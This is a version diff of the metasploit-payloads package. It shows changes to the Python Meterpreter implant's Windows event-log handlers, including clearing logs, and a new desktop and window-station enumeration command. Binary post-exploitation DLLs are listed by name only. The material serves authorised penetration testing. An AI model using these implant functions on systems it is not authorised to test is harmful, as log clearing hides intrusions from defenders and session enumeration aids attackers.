metasploit-payloads 2.0.104 → 2.0.106

Sign up to get free protection for your applications and to get access to all the features.
Files changed (76) hide show
  1. checksums.yaml +4 -4
  2. checksums.yaml.gz.sig +0 -0
  3. data/data/android/meterpreter.jar +0 -0
  4. data/data/android/metstage.jar +0 -0
  5. data/data/android/shell.jar +0 -0
  6. data/data/meterpreter/elevator.x64.debug.dll +0 -0
  7. data/data/meterpreter/elevator.x64.dll +0 -0
  8. data/data/meterpreter/elevator.x86.debug.dll +0 -0
  9. data/data/meterpreter/elevator.x86.dll +0 -0
  10. data/data/meterpreter/ext_server_bofloader.x64.debug.dll +0 -0
  11. data/data/meterpreter/ext_server_bofloader.x64.dll +0 -0
  12. data/data/meterpreter/ext_server_bofloader.x86.debug.dll +0 -0
  13. data/data/meterpreter/ext_server_bofloader.x86.dll +0 -0
  14. data/data/meterpreter/ext_server_espia.x64.debug.dll +0 -0
  15. data/data/meterpreter/ext_server_espia.x64.dll +0 -0
  16. data/data/meterpreter/ext_server_espia.x86.debug.dll +0 -0
  17. data/data/meterpreter/ext_server_espia.x86.dll +0 -0
  18. data/data/meterpreter/ext_server_extapi.x64.debug.dll +0 -0
  19. data/data/meterpreter/ext_server_extapi.x64.dll +0 -0
  20. data/data/meterpreter/ext_server_extapi.x86.debug.dll +0 -0
  21. data/data/meterpreter/ext_server_extapi.x86.dll +0 -0
  22. data/data/meterpreter/ext_server_incognito.x64.debug.dll +0 -0
  23. data/data/meterpreter/ext_server_incognito.x64.dll +0 -0
  24. data/data/meterpreter/ext_server_incognito.x86.debug.dll +0 -0
  25. data/data/meterpreter/ext_server_incognito.x86.dll +0 -0
  26. data/data/meterpreter/ext_server_kiwi.x64.debug.dll +0 -0
  27. data/data/meterpreter/ext_server_kiwi.x64.dll +0 -0
  28. data/data/meterpreter/ext_server_kiwi.x86.debug.dll +0 -0
  29. data/data/meterpreter/ext_server_kiwi.x86.dll +0 -0
  30. data/data/meterpreter/ext_server_lanattacks.x64.debug.dll +0 -0
  31. data/data/meterpreter/ext_server_lanattacks.x64.dll +0 -0
  32. data/data/meterpreter/ext_server_lanattacks.x86.debug.dll +0 -0
  33. data/data/meterpreter/ext_server_lanattacks.x86.dll +0 -0
  34. data/data/meterpreter/ext_server_peinjector.x64.debug.dll +0 -0
  35. data/data/meterpreter/ext_server_peinjector.x64.dll +0 -0
  36. data/data/meterpreter/ext_server_peinjector.x86.debug.dll +0 -0
  37. data/data/meterpreter/ext_server_peinjector.x86.dll +0 -0
  38. data/data/meterpreter/ext_server_powershell.x64.debug.dll +0 -0
  39. data/data/meterpreter/ext_server_powershell.x64.dll +0 -0
  40. data/data/meterpreter/ext_server_powershell.x86.debug.dll +0 -0
  41. data/data/meterpreter/ext_server_powershell.x86.dll +0 -0
  42. data/data/meterpreter/ext_server_priv.x64.debug.dll +0 -0
  43. data/data/meterpreter/ext_server_priv.x64.dll +0 -0
  44. data/data/meterpreter/ext_server_priv.x86.debug.dll +0 -0
  45. data/data/meterpreter/ext_server_priv.x86.dll +0 -0
  46. data/data/meterpreter/ext_server_python.x64.debug.dll +0 -0
  47. data/data/meterpreter/ext_server_python.x64.dll +0 -0
  48. data/data/meterpreter/ext_server_python.x86.debug.dll +0 -0
  49. data/data/meterpreter/ext_server_python.x86.dll +0 -0
  50. data/data/meterpreter/ext_server_sniffer.x64.dll +0 -0
  51. data/data/meterpreter/ext_server_sniffer.x86.dll +0 -0
  52. data/data/meterpreter/ext_server_stdapi.py +128 -16
  53. data/data/meterpreter/ext_server_stdapi.x64.debug.dll +0 -0
  54. data/data/meterpreter/ext_server_stdapi.x64.dll +0 -0
  55. data/data/meterpreter/ext_server_stdapi.x86.debug.dll +0 -0
  56. data/data/meterpreter/ext_server_stdapi.x86.dll +0 -0
  57. data/data/meterpreter/ext_server_unhook.x64.debug.dll +0 -0
  58. data/data/meterpreter/ext_server_unhook.x64.dll +0 -0
  59. data/data/meterpreter/ext_server_unhook.x86.debug.dll +0 -0
  60. data/data/meterpreter/ext_server_unhook.x86.dll +0 -0
  61. data/data/meterpreter/ext_server_winpmem.x64.debug.dll +0 -0
  62. data/data/meterpreter/ext_server_winpmem.x64.dll +0 -0
  63. data/data/meterpreter/ext_server_winpmem.x86.debug.dll +0 -0
  64. data/data/meterpreter/ext_server_winpmem.x86.dll +0 -0
  65. data/data/meterpreter/metsrv.x64.debug.dll +0 -0
  66. data/data/meterpreter/metsrv.x64.dll +0 -0
  67. data/data/meterpreter/metsrv.x86.debug.dll +0 -0
  68. data/data/meterpreter/metsrv.x86.dll +0 -0
  69. data/data/meterpreter/screenshot.x64.debug.dll +0 -0
  70. data/data/meterpreter/screenshot.x64.dll +0 -0
  71. data/data/meterpreter/screenshot.x86.debug.dll +0 -0
  72. data/data/meterpreter/screenshot.x86.dll +0 -0
  73. data/lib/metasploit-payloads/version.rb +1 -1
  74. data.tar.gz.sig +0 -0
  75. metadata +2 -2
  76. metadata.gz.sig +0 -0
checksums.yaml CHANGED
@@ -1,7 +1,7 @@
1
1
  ---
2
2
  SHA256:
3
- metadata.gz: e6ecc9cab0b79200d38b046332bbe62e4859e300a340a40ce4b67f179e206ecc
4
- data.tar.gz: ead5bdae63b7a0420750de525ec873e377e2b9ef77f142b69e924c11a6ee834d
3
+ metadata.gz: 453b3c01afd395af3790b8a9393781f8a90c372945a8b9b4fa597bff94ec47ee
4
+ data.tar.gz: 16129f118a5a4cee8b66e4a37b824ecf8e0aed43be918ea9b5ef0b9a566d58bc
5
5
  SHA512:
6
- metadata.gz: 35dd5a3f541b769b67e66c59b701fbeff29f5626d3a3072255d842cfe419867ad3cb579a0b10231a48e8f2aefdb8e904a78cb6bc3696da241d906d6f1f8b18ba
7
- data.tar.gz: '080dfdd332d9f9fe280e472727a5f5cdb98bbdde4e80715f18fe1f69f04145bb874dfb686a126814224531f661ead4d0bb8d3ec63f08deb0fd2175ce4463d731'
6
+ metadata.gz: 263ccd130cdac66596843e65b9eac343be1bf554896eef1903a6180cf6955326b967a901b0fe7bef73a9e1f1435178d2d47e74aee1c7f4d247e565504726030b
7
+ data.tar.gz: 63b34db9fe29f7c6bd2d643b40b6a3fdc3963e994226235888de75da78e5d918caa911734b652dfea415a00f4211dede45180e02334fe8111644ba761e17bdc7
checksums.yaml.gz.sig CHANGED
Binary file
Binary file
Binary file
Binary file
Binary file
Binary file
@@ -1,4 +1,5 @@
1
1
  import fnmatch
2
+ import functools
2
3
  import getpass
3
4
  import os
4
5
  import platform
@@ -669,7 +670,11 @@ TLV_TYPE_TERMINAL_COLUMNS = TLV_META_TYPE_UINT | 2601
669
670
  ##
670
671
  TLV_TYPE_IDLE_TIME = TLV_META_TYPE_UINT | 3000
671
672
  TLV_TYPE_KEYS_DUMP = TLV_META_TYPE_STRING | 3001
672
- TLV_TYPE_DESKTOP = TLV_META_TYPE_STRING | 3002
673
+
674
+ TLV_TYPE_DESKTOP = TLV_META_TYPE_GROUP | 3004
675
+ TLV_TYPE_DESKTOP_SESSION = TLV_META_TYPE_UINT | 3005
676
+ TLV_TYPE_DESKTOP_STATION = TLV_META_TYPE_STRING | 3006
677
+ TLV_TYPE_DESKTOP_NAME = TLV_META_TYPE_STRING | 3007
673
678
 
674
679
  ##
675
680
  # Event Log
@@ -744,6 +749,9 @@ VER_PLATFORM_WIN32s = 0x0000
744
749
  VER_PLATFORM_WIN32_WINDOWS = 0x0001
745
750
  VER_PLATFORM_WIN32_NT = 0x0002
746
751
 
752
+ # Windows Access Controls
753
+ MAXIMUM_ALLOWED = 0x02000000
754
+
747
755
  WIN_AF_INET = 2
748
756
  WIN_AF_INET6 = 23
749
757
 
@@ -1440,7 +1448,10 @@ def stdapi_sys_power_exitwindows(request, response):
1440
1448
  @register_function_if(has_windll)
1441
1449
  def stdapi_sys_eventlog_open(request, response):
1442
1450
  source_name = packet_get_tlv(request, TLV_TYPE_EVENT_SOURCENAME)['value']
1443
- handle = ctypes.windll.advapi32.OpenEventLogW(None, source_name)
1451
+ OpenEventLogA = ctypes.windll.advapi32.OpenEventLogA
1452
+ OpenEventLogA.argtypes = [ctypes.c_char_p, ctypes.c_char_p]
1453
+ OpenEventLogA.restype = ctypes.c_void_p
1454
+ handle = OpenEventLogA(None, bytes(source_name, 'UTF-8'))
1444
1455
  if not handle:
1445
1456
  return error_result_windows(), response
1446
1457
  response += tlv_pack(TLV_TYPE_EVENT_HANDLE, handle)
@@ -1451,13 +1462,15 @@ def stdapi_sys_eventlog_read(request, response):
1451
1462
  handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
1452
1463
  flags = packet_get_tlv(request, TLV_TYPE_EVENT_READFLAGS)['value']
1453
1464
  offset = packet_get_tlv(request, TLV_TYPE_EVENT_RECORDOFFSET)['value']
1454
- adv32 = ctypes.windll.advapi32
1455
- bytes_read = ctypes.c_ulong(0)
1456
- bytes_needed = ctypes.c_ulong(0)
1457
- if adv32.ReadEventLogW(handle, flags, offset, ctypes.byref(bytes_read), 0, ctypes.byref(bytes_read), ctypes.byref(bytes_needed)):
1465
+ bytes_read = ctypes.c_uint32(0)
1466
+ bytes_needed = ctypes.c_uint32(0)
1467
+ ReadEventLogA = ctypes.windll.advapi32.ReadEventLogA
1468
+ ReadEventLogA.argtypes = [ctypes.c_void_p, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_void_p, ctypes.c_uint32, ctypes.POINTER(ctypes.c_uint32), ctypes.POINTER(ctypes.c_uint32)]
1469
+ ReadEventLogA.restype = ctypes.c_bool
1470
+ if ReadEventLogA(handle, flags, offset, ctypes.byref(bytes_read), 0, ctypes.byref(bytes_read), ctypes.byref(bytes_needed)):
1458
1471
  return error_result_windows(), response
1459
- buf = ctypes.create_unicode_buffer(bytes_needed.value)
1460
- if not adv32.ReadEventLogW(handle, flags, offset, buf, bytes_needed, ctypes.byref(bytes_read), ctypes.byref(bytes_needed)):
1472
+ buf = (ctypes.c_uint8 * bytes_needed.value)()
1473
+ if not ReadEventLogA(handle, flags, offset, buf, bytes_needed, ctypes.byref(bytes_read), ctypes.byref(bytes_needed)):
1461
1474
  return error_result_windows(), response
1462
1475
  record = ctstruct_unpack(EVENTLOGRECORD, buf)
1463
1476
  response += tlv_pack(TLV_TYPE_EVENT_RECORDNUMBER, record.RecordNumber)
@@ -1466,8 +1479,9 @@ def stdapi_sys_eventlog_read(request, response):
1466
1479
  response += tlv_pack(TLV_TYPE_EVENT_ID, record.EventID)
1467
1480
  response += tlv_pack(TLV_TYPE_EVENT_TYPE, record.EventType)
1468
1481
  response += tlv_pack(TLV_TYPE_EVENT_CATEGORY, record.EventCategory)
1469
- response += tlv_pack(TLV_TYPE_EVENT_DATA, buf.raw[record.DataOffset:record.DataOffset + record.DataLength])
1470
- event_strings = buf.raw[record.StringOffset:].split('\x00', record.NumStrings)
1482
+ response += tlv_pack(TLV_TYPE_EVENT_DATA, ctarray_to_bytes(buf[record.DataOffset:record.DataOffset + record.DataLength]))
1483
+ event_string_buf = (ctypes.c_uint8 * len(buf[record.StringOffset:]))(*buf[record.StringOffset:])
1484
+ event_strings = ctarray_to_bytes(event_string_buf).split(NULL_BYTE, record.NumStrings)[:record.NumStrings]
1471
1485
  for event_string in event_strings:
1472
1486
  response += tlv_pack(TLV_TYPE_EVENT_STRING, event_string)
1473
1487
  return ERROR_SUCCESS, response
@@ -1475,14 +1489,20 @@ def stdapi_sys_eventlog_read(request, response):
1475
1489
  @register_function_if(has_windll)
1476
1490
  def stdapi_sys_eventlog_clear(request, response):
1477
1491
  handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
1478
- if not ctypes.windll.advapi32.ClearEventLogW(handle, None):
1492
+ ClearEventLogA = ctypes.windll.advapi32.ClearEventLogA
1493
+ ClearEventLogA.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
1494
+ ClearEventLogA.restype = ctypes.c_bool
1495
+ if not ClearEventLogA(handle, None):
1479
1496
  return error_result_windows(), response
1480
1497
  return ERROR_SUCCESS, response
1481
1498
 
1482
1499
  @register_function_if(has_windll)
1483
1500
  def stdapi_sys_eventlog_numrecords(request, response):
1484
1501
  handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
1485
- total = ctypes.c_ulong(0)
1502
+ total = ctypes.c_uint32(0)
1503
+ GetNumberOfEventLogRecords = ctypes.windll.advapi32.GetNumberOfEventLogRecords
1504
+ GetNumberOfEventLogRecords.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_uint32)]
1505
+ GetNumberOfEventLogRecords.restype = ctypes.c_bool
1486
1506
  if not ctypes.windll.advapi32.GetNumberOfEventLogRecords(handle, ctypes.byref(total)):
1487
1507
  return error_result_windows(), response
1488
1508
  response += tlv_pack(TLV_TYPE_EVENT_NUMRECORDS, total.value)
@@ -1491,16 +1511,22 @@ def stdapi_sys_eventlog_numrecords(request, response):
1491
1511
  @register_function_if(has_windll)
1492
1512
  def stdapi_sys_eventlog_oldest(request, response):
1493
1513
  handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
1494
- oldest = ctypes.c_ulong(0)
1495
- if not ctypes.windll.advapi32.GetOldestEventLogRecordW(handle, ctypes.byref(oldest)):
1514
+ GetOldestEventLogRecord = ctypes.windll.advapi32.GetOldestEventLogRecord
1515
+ GetOldestEventLogRecord.argtypes = [ctypes.c_void_p, ctypes.POINTER(ctypes.c_uint32)]
1516
+ GetOldestEventLogRecord.restype = ctypes.c_bool
1517
+ oldest = ctypes.c_uint32(0)
1518
+ if not GetOldestEventLogRecord(handle, ctypes.byref(oldest)):
1496
1519
  return error_result_windows(), response
1497
- response += tlv_pack(TLV_TYPE_EVENT_RECORDNUMBER, oldest)
1520
+ response += tlv_pack(TLV_TYPE_EVENT_RECORDNUMBER, oldest.value)
1498
1521
  return ERROR_SUCCESS, response
1499
1522
 
1500
1523
  @register_function_if(has_windll)
1501
1524
  def stdapi_sys_eventlog_close(request, response):
1502
1525
  handle = packet_get_tlv(request, TLV_TYPE_EVENT_HANDLE)['value']
1503
- if not ctypes.windll.advapi32.CloseEventLogW(handle):
1526
+ CloseEventLog = ctypes.windll.advapi32.CloseEventLog
1527
+ CloseEventLog.argtypes = [ctypes.c_void_p]
1528
+ CloseEventLog.restype = ctypes.c_bool
1529
+ if not CloseEventLog(handle):
1504
1530
  return error_result_windows(), response
1505
1531
  return ERROR_SUCCESS, response
1506
1532
 
@@ -2755,6 +2781,92 @@ def stdapi_ui_get_idle_time(request, response):
2755
2781
  response += tlv_pack(TLV_TYPE_IDLE_TIME, idle_time)
2756
2782
  return ERROR_SUCCESS, response
2757
2783
 
2784
+ @register_function_if(has_windll)
2785
+ def stdapi_ui_desktop_enum(request, response):
2786
+
2787
+ response_parts = []
2788
+ if ctypes.sizeof(ctypes.c_long) == ctypes.sizeof(ctypes.c_void_p):
2789
+ LPARAM = ctypes.c_long
2790
+ elif ctypes.sizeof(ctypes.c_longlong) == ctypes.sizeof(ctypes.c_void_p):
2791
+ LPARAM = ctypes.c_longlong
2792
+
2793
+ DESKTOPENUMPROCA = ctypes.WINFUNCTYPE(ctypes.c_long, ctypes.c_char_p, LPARAM)
2794
+ EnumDesktopsA = ctypes.windll.user32.EnumDesktopsA
2795
+ EnumDesktopsA.argtypes = [ctypes.c_void_p, DESKTOPENUMPROCA, LPARAM]
2796
+ EnumDesktopsA.restype = ctypes.c_long
2797
+
2798
+ WINSTAENUMPROCA = ctypes.WINFUNCTYPE(ctypes.c_long, ctypes.c_char_p, LPARAM)
2799
+ EnumWindowStationsA = ctypes.windll.user32.EnumWindowStationsA
2800
+ EnumWindowStationsA.argtypes = [WINSTAENUMPROCA, LPARAM]
2801
+ EnumWindowStationsA.restype = ctypes.c_long
2802
+
2803
+ OpenWindowStationA = ctypes.windll.user32.OpenWindowStationA
2804
+ OpenWindowStationA.argtypes = [ctypes.c_char_p, ctypes.c_long, ctypes.c_bool]
2805
+ OpenWindowStationA.restype = ctypes.c_void_p
2806
+
2807
+ CloseWindowStation = ctypes.windll.user32.CloseWindowStation
2808
+ CloseWindowStation.argtypes = [ctypes.c_void_p]
2809
+ CloseWindowStation.restype = ctypes.c_long
2810
+
2811
+ GetCurrentProcessId = ctypes.windll.kernel32.GetCurrentProcessId
2812
+ GetCurrentProcessId.restype = ctypes.c_ulong
2813
+
2814
+ GetProcAddress = ctypes.windll.kernel32.GetProcAddress
2815
+ GetProcAddress.argtypes = [ctypes.c_void_p, ctypes.c_char_p]
2816
+ GetProcAddress.restype = ctypes.c_void_p
2817
+
2818
+ def get_session_id(pid):
2819
+ dwSessionId = ctypes.c_ulong(0)
2820
+
2821
+ ProcessIdToSessionId = ctypes.windll.kernel32.ProcessIdToSessionId
2822
+ ProcessIdToSessionId.argtypes = [ctypes.c_ulong, ctypes.POINTER(ctypes.c_ulong)]
2823
+ ProcessIdToSessionId.restype = ctypes.c_bool
2824
+
2825
+ if not ProcessIdToSessionId(ctypes.c_ulong(pid), ctypes.byref(dwSessionId)):
2826
+ dwSessionId = ctypes.c_ulong(-1)
2827
+
2828
+ return dwSessionId
2829
+
2830
+
2831
+ def desktop_enumdesktops_callback(response_parts, session_id, station_name, lpszDesktop, lParam):
2832
+ if not station_name or not lpszDesktop:
2833
+ return True
2834
+
2835
+ entry = bytes()
2836
+ entry += tlv_pack(TLV_TYPE_DESKTOP_SESSION, session_id)
2837
+ entry += tlv_pack(TLV_TYPE_DESKTOP_STATION, station_name)
2838
+ entry += tlv_pack(TLV_TYPE_DESKTOP_NAME, lpszDesktop.decode())
2839
+
2840
+ response_parts.append(tlv_pack(TLV_TYPE_DESKTOP, entry))
2841
+
2842
+ return True
2843
+
2844
+ @WINSTAENUMPROCA
2845
+ def desktop_enumstations_callback(lpszWindowStation, lParam):
2846
+ hWindowStation = OpenWindowStationA(lpszWindowStation, False, MAXIMUM_ALLOWED)
2847
+ if not hWindowStation:
2848
+ return True
2849
+
2850
+ callback = functools.partial(desktop_enumdesktops_callback, response_parts)
2851
+ session_id = get_session_id(GetCurrentProcessId()).value
2852
+ station_name = lpszWindowStation.decode()
2853
+ callback = functools.partial(desktop_enumdesktops_callback, response_parts, session_id, station_name)
2854
+ callback = DESKTOPENUMPROCA(callback)
2855
+ EnumDesktopsA(hWindowStation, callback, 0)
2856
+
2857
+ if hWindowStation:
2858
+ CloseWindowStation(hWindowStation)
2859
+
2860
+ return True
2861
+
2862
+ success = EnumWindowStationsA(desktop_enumstations_callback, 0)
2863
+ if not success:
2864
+ return error_result_windows(), response
2865
+
2866
+ response += bytes().join(response_parts)
2867
+
2868
+ return ERROR_SUCCESS, response
2869
+
2758
2870
  @register_function_if(has_termios and has_fcntl)
2759
2871
  def stdapi_sys_process_set_term_size(request, response):
2760
2872
  channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
Binary file
Binary file
Binary file
Binary file
Binary file
Binary file
@@ -1,6 +1,6 @@
1
1
  # -*- coding:binary -*-
2
2
  module MetasploitPayloads
3
- VERSION = '2.0.104'
3
+ VERSION = '2.0.106'
4
4
 
5
5
  def self.version
6
6
  VERSION
data.tar.gz.sig CHANGED
Binary file
metadata CHANGED
@@ -1,7 +1,7 @@
1
1
  --- !ruby/object:Gem::Specification
2
2
  name: metasploit-payloads
3
3
  version: !ruby/object:Gem::Version
4
- version: 2.0.104
4
+ version: 2.0.106
5
5
  platform: ruby
6
6
  authors:
7
7
  - OJ Reeves
@@ -96,7 +96,7 @@ cert_chain:
96
96
  EknWpNgVhohbot1lfVAMmIhdtOVaRVcQQixWPwprDj/ydB8ryDMDosIMcw+fkoXU
97
97
  9GJsSaSRRYQ9UUkVL27b64okU8D48m8=
98
98
  -----END CERTIFICATE-----
99
- date: 2022-12-13 00:00:00.000000000 Z
99
+ date: 2023-01-12 00:00:00.000000000 Z
100
100
  dependencies:
101
101
  - !ruby/object:Gem::Dependency
102
102
  name: rake
metadata.gz.sig CHANGED
Binary file